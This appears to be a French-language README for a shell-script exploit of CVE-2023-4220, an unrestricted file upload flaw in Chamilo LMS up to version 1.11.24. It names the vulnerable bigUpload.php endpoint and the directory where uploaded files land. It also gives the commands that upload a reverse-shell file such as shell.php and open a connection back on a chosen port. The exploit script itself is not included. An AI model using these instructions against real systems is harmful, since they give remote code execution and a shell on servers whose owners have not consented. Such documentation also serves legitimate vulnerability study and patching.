
Exploit basé sur shell pour CVE-2023-4220 ciblant le téléchargement de fichiers sans restriction dans Chamilo LMS. Télécharge des fichiers arbitraires pour exécuter des shells inversés sur des instances vulnérables.
Cet exploit démontre une vulnérabilité de téléversement de fichiers sans restriction dans Chamilo-LMS. La vulnérabilité affecte la fonctionnalité de téléversement de gros fichiers située à :
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
Versions affectées : Chamilo LMS <= v1.11.24
La vulnérabilité permet de téléverser des fichiers arbitraires vers :
/main/inc/lib/javascript/bigupload/files/
Tout d'abord, rendez l'exploit exécutable et consultez les informations d'utilisation :
chmod +x CVE-2023-4220.sh
./CVE-2023-4220.sh
Exécutez l'exploit avec les paramètres requis :
./CVE-2023-4220.sh -f reverse_file -h host_link -p port_in_the_reverse_file
Vérifiez le fichier téléversé à l'adresse :
http://target.test/main/inc/lib/javascript/bigupload/files/
-f : Spécifie le fichier à téléverser-h : URL de l'hôte cible-p : Numéro de port pour la connexion./CVE-2023-4220.sh -f shell.php -h http://target.test -p 4444
La vulnérabilité se situe dans le mécanisme de téléversement de fichiers de Chamilo LMS, qui ne parvient pas à valider correctement les fichiers téléversés dans la fonctionnalité de téléversement de gros fichiers.
/main/inc/lib/javascript/bigupload/inc/bigUpload.php
/main/inc/lib/javascript/bigupload/files/